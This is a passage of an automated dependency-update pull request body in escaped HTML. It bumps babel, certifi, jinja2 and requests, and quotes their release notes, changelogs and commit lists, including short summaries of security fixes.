2.9.1\u003c/h2\u003e\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* The internal locale-data loading functions now validate the name of the locale file to be loaded and only\n  allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/a99fa2474c808b51ebdabea18db871e389751559\"\u003e\u003ccode\u003ea99fa24\u003c/code\u003e\u003c/a\u003e Use 2.9.0's setup.py for 2.9.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/60b33e083801109277cb068105251e76d0b7c14e\"\u003e\u003ccode\u003e60b33e0\u003c/code\u003e\u003c/a\u003e Become 2.9.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/412015ef642bfcc0d8ba8f4d05cdbb6aac98d9b3\"\u003e\u003ccode\u003e412015e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/782\"\u003e#782\u003c/a\u003e from python-babel/locale-basename\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/5caf717ceca4bd235552362b4fbff88983c75d8c\"\u003e\u003ccode\u003e5caf717\u003c/code\u003e\u003c/a\u003e Disallow special filenames on Windows\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/3a700b5b8b53606fd98ef8294a56f9510f7290f8\"\u003e\u003ccode\u003e3a700b5\u003c/code\u003e\u003c/a\u003e Run locale identifiers through \u003ccode\u003eos.path.basename()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/5afe2b2f11dcdd6090c00231d342c2e9cd1bdaab\"\u003e\u003ccode\u003e5afe2b2\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/754\"\u003e#754\u003c/a\u003e from python-babel/github-ci\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/58de8342f865df88697a4a166191e880e3c84d82\"\u003e\u003ccode\u003e58de834\u003c/code\u003e\u003c/a\u003e Replace Travis + Appveyor with GitHub Actions (WIP)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/d1bbc08e845d03d8e1f0dfa0e04983d755f39cb5\"\u003e\u003ccode\u003ed1bbc08\u003c/code\u003e\u003c/a\u003e import_cldr: use logging; add -q option\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/156b7fb9f377ccf58c71cf01dc69fb10c7b69314\"\u003e\u003ccode\u003e156b7fb\u003c/code\u003e\u003c/a\u003e Quiesce CLDR download progress bar if requested (or not a TTY)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/613dc1700f91c3d40b081948c0dd6023d8ece057\"\u003e\u003ccode\u003e613dc17\u003c/code\u003e\u003c/a\u003e Make the import warnings about unsupported number systems less verbose\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/python-babel/babel/compare/v2.9.0...v2.9.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `certifi` from 2020.12.5 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2020.12.05...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jinja2` from 2.11.3 to 3.1.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/releases\"\u003ejinja2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.6\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.6 security release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.6/\"\u003ehttps://pypi.org/project/Jinja2/3.1.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\"\u003ehttps://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup, allowing the sandbox to apply its checks. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\"\u003ehttps://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.5\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.5 security fix release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.5/\"\u003ehttps://pypi.org/project/Jinja2/3.1.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/changes/#version-3-1-5\"\u003ehttps://jinja.palletsprojects.com/changes/#version-3-1-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/jinja/milestone/16?closed=1\"\u003ehttps://github.com/pallets/jinja/milestone/16?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as by passing a stored reference to a filter that calls its argument. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h\"\u003eGHSA-q2x7-8rv6-6q7h\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid issues with names that contain f-string syntax. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1792\"\u003e#1792\u003c/a\u003e, \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699\"\u003eGHSA-gmj6-6f8f-6699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence types. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1952\"\u003e#1952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment when calling block references. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1701\"\u003e#1701\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another async-aware filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1781\"\u003e#1781\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1921\"\u003e#1921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e call. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e objects. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2025\"\u003e#2025\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2061\"\u003e#2061\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were searched. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not contain the templates directory. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1705\"\u003e#1705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1880\"\u003e#1880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1870\"\u003e#1870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTests decorated with \u003ccode\u003e@pass_context\u003c/code\u003e can be used with the \u003ccode\u003e|select\u003c/code\u003e filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1624\"\u003e#1624\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e for multiple assignment (\u003ccode\u003ea, b = 1, 2\u003c/code\u003e) does not fail when the target is a namespace attribute. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1413\"\u003e#1413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e in all branches of \u003ccode\u003e{% if %}{% elif %}{% else %}\u003c/code\u003e blocks does not cause the variable to be considered initially undefined. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1253\"\u003e#1253\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.4\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.4 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.4/\"\u003ehttps://pypi.org/project/Jinja2/3.1.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\"\u003ehttps://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003exmlattr\u003c/code\u003e filter does not allow keys with \u003ccode\u003e/\u003c/code\u003e solidus, \u003ccode\u003e\u0026gt;\u003c/code\u003e greater-than sign, or \u003ccode\u003e=\u003c/code\u003e equals sign, in addition to disallowing spaces. Regardless of any validation done by Jinja, user input should never be used as keys to this filter, or must be separately validated first. GHSA-h75v-3vvj-5mfj\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 3.1.x feature branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\"\u003eGHSA-h5c8-rqwp-cp95\u003c/a\u003e. You are affected if you are using \u003ccode\u003exmlattr\u003c/code\u003e and passing user input as attribute keys.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/blob/main/CHANGES.rst\"\u003ejinja2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.1.6\u003c/h2\u003e\n\u003cp\u003eReleased 2025-03-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup,\nallowing the sandbox to apply its checks. :ghsa:\u003ccode\u003ecpwx-vrp4-4pq7\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.1.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-12-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as\nby passing a stored reference to a filter that calls its argument.\n:ghsa:\u003ccode\u003eq2x7-8rv6-6q7h\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid\nissues with names that contain f-string syntax.\n:issue:\u003ccode\u003e1792\u003c/code\u003e, :ghsa:\u003ccode\u003egmj6-6f8f-6699\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence\ntypes. :issue:\u003ccode\u003e2032\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e.\n:pr:\u003ccode\u003e1952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends.\n:pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment\nwhen calling block references. :issue:\u003ccode\u003e1701\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another\nasync-aware filter. :issue:\u003ccode\u003e1781\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation.\n:issue:\u003ccode\u003e1921\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e\ncall. :issue:\u003ccode\u003e2021\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e\nobjects. :issue:\u003ccode\u003e2025\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object.\n:issue:\u003ccode\u003e2027\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. :pr:\u003ccode\u003e2061\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were\nsearched. :issue:\u003ccode\u003e1661\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not\ncontain the templates directory. :issue:\u003ccode\u003e1705\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. :pr:\u003ccode\u003e1880\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. :pr:\u003ccode\u003e1870\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/15206881c006c79667fe5154fe80c01c65410679\"\u003e\u003ccode\u003e1520688\u003c/code\u003e\u003c/a\u003e release version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403\"\u003e\u003ccode\u003e90457bb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/065334d1ee5b7210e1a0a93c37238c86858f2af7\"\u003e\u003ccode\u003e065334d\u003c/code\u003e\u003c/a\u003e attr filter uses env.getattr\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/033c20015c7ca899ab52eb921bb0f08e6d3dd145\"\u003e\u003ccode\u003e033c200\u003c/code\u003e\u003c/a\u003e start version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/bc68d4efa99c5f77334f0e519628558059ae8c35\"\u003e\u003ccode\u003ebc68d4e\u003c/code\u003e\u003c/a\u003e use global contributing guide (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/247de5e0c5062a792eb378e50e13e692885ee486\"\u003e\u003ccode\u003e247de5e\u003c/code\u003e\u003c/a\u003e use global contributing guide\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/ab8218c7a1b66b62e0ad6b941bd514e3a64a358f\"\u003e\u003ccode\u003eab8218c\u003c/code\u003e\u003c/a\u003e use project advisory link instead of global\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/b4ffc8ff299dfd360064bea4cd2f862364601ad2\"\u003e\u003ccode\u003eb4ffc8f\u003c/code\u003e\u003c/a\u003e release version 3.1.5 (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2066\"\u003e#2066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/877f6e51be8e1765b06d911cfaa9033775f051d1\"\u003e\u003ccode\u003e877f6e5\u003c/code\u003e\u003c/a\u003e release version 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/8d588592653b052f957b720e1fc93196e06f207f\"\u003e\u003ccode\u003e8d58859\u003c/code\u003e\u003c/a\u003e remove test pypi\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/jinja/compare/2.11.3...3.1.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.25.1 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.0\u003c/h2\u003e\n\u003cp\u003e2.32.0 (2024-05-20)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's 